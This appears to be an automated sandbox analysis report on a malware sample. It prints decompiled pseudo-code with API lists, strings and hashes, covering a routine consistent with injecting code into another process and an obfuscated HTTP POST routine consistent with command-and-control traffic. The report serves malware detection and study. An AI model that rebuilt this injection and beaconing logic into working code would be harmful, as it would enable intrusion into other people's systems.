										E000C9640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000C85D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000C91E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E000CDA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E000C861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x000cdb45
0x000cdb4b
0x000cdb52
0x000cdb55
0x000cdb58
0x000cdb5d
0x000cdb5f
0x000cdb64
0x000cdfac
0x000cdfac
0x000cdb71
0x000cdb73
0x000cdb76
0x000cdb79
0x000cdf91
0x000cdf97
0x000cdfa1
0x00000000
0x000cdfa6
0x000cdb84
0x000cdb8b
0x000cdb92
0x000cdb95
0x000cdb9a
0x000cdb9c
0x000cdb9f
0x000cdba2
0x000cdba3
0x000cdbac
0x000cdbb2
0x000cdbb5
0x000cdbbe
0x000cdbc3
0x000cdbc8
0x000cdbdf
0x000cdbec
0x000cdbef
0x000cdbf6
0x000cdbfb
0x000cdc02
0x000cdc07
0x000cdc0e
0x000cdc10
0x000cdc1c
0x000cdc1f
0x000cdc21
0x000cdf81
0x000cdf82
0x000cdf8b
0x00000000
0x000cdf8b
0x000cdc27
0x000cdc2a
0x000cdc2d
0x000cdc30
0x000cdc32
0x000cdf4d
0x000cdf50
0x000cdf53
0x000cdf55
0x000cdf77
0x000cdf7c
0x000cdf57
0x000cdf5a
0x000cdf65
0x000cdf6c
0x000cdf6c
0x00000000
0x00000000
0x00000000
0x00000000
0x000cdc38
0x000cdc38
0x000cdc4a
0x000cdc4d
0x000cdc4f
0x00000000
0x00000000
0x000cdc57
0x000cdc5a
0x000cdc5d
0x000cdc60
0x000cdc63
0x000cdc66
0x00000000
0x00000000
0x000cdc6c
0x000cdc7a
0x000cdc7d
0x000cdc7f
0x000cdc98
0x000cdca7
0x000cdcaf
0x000cdcaf
0x000cdcb2
0x000cdcb9
0x000cdcbd
0x000cdcc3
0x000cdcc5
0x000cdf35
0x000cdf3b
0x000cdf41
0x000cdf44
0x000cdf44
0x00000000
0x000cdf44
0x000cdcd4
0x000cdce8
0x000cdcec
0x000cdcee
0x000cdcf3
0x000cdf02
0x000cdf08
0x000cdf13
0x000cdf1e
0x000cdf24
0x000cdf2a
0x000cdf2d
0x00000000
0x000cdf2d
0x000cdcf9
0x000cded0
0x000cded0
0x000cded3
0x000cded6
0x00000000
0x00000000
0x000cdd01
0x000cdd09
0x000cdd10
0x000cdd16
0x000cdd18
0x00000000
0x00000000
0x000cdd21
0x000cdd36
0x000cdd3c
0x000cdd45
0x000cdd48
0x000cdd4b
0x000cdd4d
0x000cdec3
0x000cdec6
0x000cdecf
0x000cdecf
0x00000000
0x000cdecf
0x000cdd5d
0x000cdd60
0x000cdd67
0x000cdd6d
0x000cdd70
0x000cdd73
0x000cdd76
0x000cdd79
0x000cddb5
0x000cddb5
0x000cddb8
0x000cde64
0x000cde78
0x000cde88
0x000cde8c
0x000cde8e
0x000cdea5
0x000cdea9
0x000cdeb2
0x000cdebd
0x00000000
0x000cdebd
0x000cde94
0x000cde95
0x000cde9a
0x000cde9a
0x000cde9c
0x000cde9d
0x000cdea2
0x00000000
0x000cdea2
0x000cddbe
0x000cddbe
0x000cddc1
0x000cde2c
0x000cde40
0x000cde50
0x000cde54
0x000cde56
0x00000000
0x00000000
0x000cde5c
0x000cde5d
0x00000000
0x000cde5d
0x000cddc3
0x000cddc3
0x000cddc6
0x00000000
0x00000000
0x000cddc8
0x000cddcb
0x00000000
0x00000000
0x000cddcd
0x000cddcd
0x000cddd3
0x000cddef
0x000cddfe
0x000cde07
0x000cde0c
0x000cde0f
0x000cde15
0x000cde15
0x000cde1a
0x000cde26
0x00000000
0x000cde26
0x000cddd8
0x00000000
0x000cddd8
0x000cdd7b
0x000cdda2
0x000cdda7
0x000cddac
0x000cddae
0x000cddae
0x00000000
0x000cddac
0x000cdd7d
0x000cdd7d
0x000cdd80
0x00000000
0x00000000
0x000cdd86
0x000cdd86
0x000cdd89
0x00000000
0x00000000
0x000cdd8f
0x000cdd8f
0x000cdd92
0x00000000
0x00000000
0x000cdd98
0x000cdd9b
0x00000000
0x00000000
0x000cdd9d
0x00000000
0x000cdd9d
0x000cdedf
0x000cdee5
0x000cdeeb
0x000cdeee
0x000cdef1
0x000cdef1
0x000cdef4
0x000cdef5
0x000cdef8
0x000cdefa
0x00000000
0x00000000
0x000cdf4a
0x000cdf4a
0x00000000
0x000cdf4a
0x000cdc81
0x000cdc87
0x00000000
0x000cdc87
0x000cdf47
0x00000000
0x000cdbca
0x000cdbcf
0x000cdbd4
0x00000000
0x000cdbd8

APIs

Part of subcall function 000CD523: CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
Part of subcall function 000CD523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
Part of subcall function 000CD523: CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
Part of subcall function 000CD523: SysAllocString.OLEAUT32(00000000), ref: 000CD569
Part of subcall function 000CD523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

SysAllocString.OLEAUT32(00000000), ref: 000CDBE5
SysAllocString.OLEAUT32(00000000), ref: 000CDBF9
SysFreeString.OLEAUT32(?), ref: 000CDF82
SysFreeString.OLEAUT32(?), ref: 000CDF8B

Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660

Strings

TRUE, xrefs: 000CDDA7
FALSE, xrefs: 000CDDAE

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 1290676130-1412513891
Opcode ID: b4121a1a41596529dc1ee25c4bcfd864bb451ba9a9ed97b737e2e7ffff192dbb
Instruction ID: 6d3b30d497bcb0c8dfd19b86225b387c7b8e5a58e6196622d1d0c5e8feda6800
Opcode Fuzzy Hash: b4121a1a41596529dc1ee25c4bcfd864bb451ba9a9ed97b737e2e7ffff192dbb
Instruction Fuzzy Hash: DCE14F71D00219AFDB54EFA4C989FEEBBB9FF48300F10816EE505AB291DB75A905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000CC6C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200
registryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E000CC6C0(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0xde688; // 0xf0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E000CE23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0xde780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0xde780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0xde780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0xde780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0xde780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0xde780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E000C8669( *0xde688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0xde684; // 0x27bf8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0xde684; // 0x27bf8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E000C861A( &_v32, 0x1ac4);
					_t141 =  *0xde688; // 0xf0000
					 *0xde688 = _t131;
					E000C86E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E000CC63F(_v12, _v8, _v36);
					 *0xde688 = _t141;
					goto L14;
				}
			}

0x000cc6c6
0x000cc6cd
0x000cc6cf
0x000cc6d1
0x000cc6d3
0x000cc6d6
0x000cc6d9
0x000cc6dc
0x000cc6df
0x000cc6e2
0x000cc6e5
0x000cc6ef
0x000cc6f2
0x000cc6f9
0x000cc6fe
0x000cc6fe
0x000cc704
0x000cc706
0x000cc70f
0x000cc8b5
0x000cc8b9
0x000cc8be
0x000cc8c4
0x000cc8c7
0x000cc8c7
0x000cc8cb
0x000cc8d0
0x000cc8d5
0x000cc8e2
0x000cc8e2
0x000cc8eb
0x000cc8ed
0x000cc8f5
0x000cc8f5
0x000cc8fc
0x000cc8fc
0x000cc718
0x000cc719
0x000cc71e
0x000cc724
0x000cc726
0x000cc727
0x000cc728
0x000cc72d
0x000cc72e
0x000cc738
0x00000000
0x00000000
0x000cc743
0x000cc74d
0x000cc757
0x000cc75a
0x000cc760
0x000cc767
0x000cc768
0x000cc769
0x000cc772
0x000cc773
0x000cc774
0x000cc776
0x000cc779
0x000cc77c
0x000cc77f
0x000cc782
0x000cc78e
0x000cc7b0
0x000cc7b8
0x000cc7bb
0x000cc7c6
0x000cc7c6
0x000cc7b8
0x000cc7cc
0x000cc7d5
0x000cc7d7
0x000cc7d8
0x000cc7da
0x000cc7db
0x000cc7dc
0x000cc7dd
0x000cc7e1
0x000cc7e8
0x000cc7e9
0x000cc7f1
0x000cc8b2
0x00000000
0x000cc7f7
0x000cc7f7
0x000cc7f9
0x000cc7fa
0x000cc7ff
0x000cc800
0x000cc801
0x000cc802
0x000cc803
0x000cc809
0x000cc80a
0x000cc80f
0x000cc810
0x000cc818
0x00000000
0x00000000
0x000cc82e
0x000cc830
0x000cc837
0x00000000
0x00000000
0x000cc848
0x000cc84e
0x000cc856
0x000cc859
0x000cc85f
0x000cc86f
0x000cc87b
0x000cc880
0x000cc886
0x000cc896
0x000cc8a2
0x000cc8aa
0x00000000
0x000cc8aa

APIs

RegisterClassExA.USER32 ref: 000CC785
CreateWindowExA.USER32 ref: 000CC7B0
DestroyWindow.USER32 ref: 000CC7BB
UnregisterClassA.USER32(?,00000000), ref: 000CC7C6
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 000CC7E2
GetCurrentProcess.KERNEL32(00000000), ref: 000CC8DB

Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660

Strings

sadccdcdsasa, xrefs: 000CC73E
0, xrefs: 000CC74D
cdcdwqwqwq, xrefs: 000CC76A

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 3082384575-2319545179
Opcode ID: 9b7369576984f46db23a614ba67677450efd48935115db429422099e1f3bac59
Instruction ID: 90c4ed74458554630278fabfd861411d24eeea79e783751d3e5e158c8fbe04a2
Opcode Fuzzy Hash: 9b7369576984f46db23a614ba67677450efd48935115db429422099e1f3bac59
Instruction Fuzzy Hash: EF711971901249AFEB11DF95DC48FAFBBB9EF49700F14406AF905AB290D774AA04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 000C5F82, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000C85EF();
				_t19 = E000C980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E000C8F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0xde69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000C95C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000C85C2( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E000D2A5B( *0xde69c);
						 *_t55 = 0x7c3;
						 *0xde684 = E000CE1BC(0xdba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000C95E1(0xdba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000C85D5();
							_v8 = 0;
							_t37 =  *0xde684; // 0x27bf8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E000C5E06, 0, 0,  &_v8);
							 *0xde6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000C85D5();
					}
					goto L10;
				}
			}

0x000c5f82
0x000c5f92
0x000c5f9c
0x000c60d0
0x000c60c3
0x00000000
0x000c60c5
0x000c60d7
0x000c6098
0x00000000
0x000c6098
0x000c5fa2
0x000c5faa
0x000c5fb1
0x000c5fb3
0x00000000
0x000c5fc6
0x000c5fc6
0x000c5fcc
0x000c5fd2
0x000c5fe2
0x000c5fe7
0x000c5fef
0x000c5ff7
0x000c6013
0x000c6018
0x000c601b
0x000c601d
0x000c601f
0x000c602c
0x000c6035
0x000c603e
0x000c6043
0x000c6044
0x000c6052
0x000c605c
0x000c606d
0x000c6072
0x000c6079
0x000c6080
0x000c6083
0x000c608f
0x000c6090
0x000c609c
0x000c60a5
0x000c60a9
0x000c60b7
0x000c60ba
0x000c60c1
0x00000000
0x00000000
0x00000000
0x000c60c1
0x000c6092
0x000c6097
0x00000000
0x000c5ff7

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 000C5F92
SetLastError.KERNEL32(000000AA), ref: 000C60D7

Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8

Part of subcall function 000C980C: GetSystemTimeAsFileTime.KERNEL32(?,?,000C5FAF), ref: 000C9819

GetModuleHandleA.KERNEL32(00000000), ref: 000C5FCC
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 000C5FE7
GetLastError.KERNEL32 ref: 000C5FEF
memset.MSVCRT ref: 000C6013
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 000C6035
GetFileAttributesW.KERNEL32(00000000), ref: 000C6083

Strings

Hello qqq, xrefs: 000C5F8D

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemWidememset
String ID: Hello qqq
API String ID: 3872149766-3610097158
Opcode ID: afce7757140dcc93f3ebf7c21342cb0b72ab48de7d80f37f0806af0865a9f0e7
Instruction ID: 2d4d97f5f62f02f8306ca91f288e7d0caa95757fa3380263e34e887ee25bd247
Opcode Fuzzy Hash: afce7757140dcc93f3ebf7c21342cb0b72ab48de7d80f37f0806af0865a9f0e7
Instruction Fuzzy Hash: 6831A670900604ABEB64BB34DC49FAF3BB8EB55710F20852EF915D6192DF789A49CB31

Uniqueness

Uniqueness Score: -1.00%

Function 000CE668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E000CE668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000C95C7(0x85b);
				_v60 = E000C95C7(0xdc9);
				_v56 = E000C95C7(0x65d);
				_v52 = E000C95C7(0xdd3);
				_t105 = E000C95C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E000CC379(_t214));
				_t113 =  *0xde6a4; // 0x2630798
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0xde6a4; // 0x2630798
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0xde788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0xde6a4; // 0x2630798
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0xde6a4; // 0x2630798
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0xde6a4; // 0x2630798
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0xde6a4; // 0x2630798
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0xde6a4; // 0x2630798
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E000C980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0xde6a4; // 0x2630798
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E000C980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000C95C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0xde6a4; // 0x2630798
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E000CC379(_t217), _a4, _a8);
										E000C85C2( &_v12);
										if(_a24 != 0) {
											E000C980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0xde6a4; // 0x2630798
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E000C9749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0xde6a4; // 0x2630798
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0xde6a4; // 0x2630798
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0xde6a4; // 0x2630798
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0xde6a4; // 0x2630798
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0xde6a4; // 0x2630798
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0xde6a4; // 0x2630798
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0xde6a4; // 0x2630798
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0xde6a4; // 0x2630798
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

0x000ce671
0x000ce683
0x000ce68c
0x000ce696
0x000ce69a
0x000ce6ab
0x000ce6c2
0x000ce6cf
0x000ce6dc
0x000ce6e9
0x000ce6ec
0x000ce6f1
0x000ce6f6
0x000ce6f8
0x000ce700
0x000ce70b
0x000ce712
0x000ce71e
0x000ce721
0x000ce72f
0x000ce732
0x000ce738
0x000ce739
0x000ce73b
0x000ce744
0x000ce745
0x000ce74a
0x000ce750
0x000ce75a
0x000ce75c
0x000ce761
0x000ce761
0x000ce770
0x000ce77f
0x000ce783
0x000ce792
0x000ce795
0x000ce79a
0x000ce79e
0x000ce7a5
0x000ce7ac
0x000ce7b4
0x000ce7bc
0x000ce7c3
0x000ce7cb
0x000ce7d3
0x000ce7da
0x000ce7e2
0x000ce7ea
0x000ce7ff
0x000ce80c
0x000ce80e
0x000ce813
0x000ce813
0x000ce81a
0x000ce82b
0x000ce830
0x000ce832
0x000ce832
0x000ce846
0x000ce858
0x000ce85a
0x000ce85d
0x000ce862
0x000ce862
0x000ce869
0x000ce878
0x000ce87c
0x000ce8ba
0x000ce8bf
0x000ce8c7
0x000ce8cc
0x000ce8d7
0x000ce8dd
0x000ce8e7
0x000ce8ea
0x000ce8f3
0x000ce8f8
0x000ce8f8
0x000ce901
0x000ce94a
0x000ce94c
0x000ce953
0x000ce954
0x000ce957
0x000ce95d
0x000ce961
0x000ce962
0x000ce967
0x000ce969
0x000ce96f
0x000ce984
0x000ce98c
0x000ce9c1
0x000ce9c6
0x000ce9cb
0x00000000
0x000ce9cd
0x000ce98e
0x000ce990
0x000ce990
0x000ce999
0x000ce99c
0x000ce99e
0x000ce9a0
0x000ce9a6
0x000ce9a6
0x000ce9ab
0x000ce9ad
0x000ce9b4
0x000ce9b4
0x00000000
0x000ce9b7
0x000ce971
0x000ce979
0x00000000
0x000ce903
0x000ce903
0x000ce909
0x000ce90f
0x000ce912
0x00000000
0x000ce912
0x000ce901
0x000ce87e
0x000ce884
0x000ce888
0x000ce889
0x000ce88e
0x000ce890
0x000ce896
0x000ce8b4
0x000ce8b4
0x00000000
0x000ce8b4
0x000ce898
0x000ce8a2
0x000ce8a4
0x000ce8a5
0x000ce8aa
0x000ce8ac
0x000ce8b2
0x00000000
0x00000000
0x00000000
0x000ce86b
0x000ce86b
0x000ce914
0x000ce914
0x000ce91a
0x000ce91d
0x00000000
0x000ce91d
0x000ce81c
0x000ce81c
0x000ce91f
0x000ce91f
0x000ce925
0x000ce928
0x00000000
0x000ce928
0x000ce81a
0x000ce785
0x000ce92a
0x000ce92d
0x000ce92f
0x000ce932
0x000ce935
0x000ce93e
0x000ce943
0x00000000
0x00000000
0x000ce947
0x00000000
0x000ce947
0x000ce754
0x00000000

APIs

memset.MSVCRT ref: 000CE69A
memset.MSVCRT ref: 000CE6AB
memset.MSVCRT ref: 000CE700
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 000CE785

Strings

POST, xrefs: 000CE84B

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
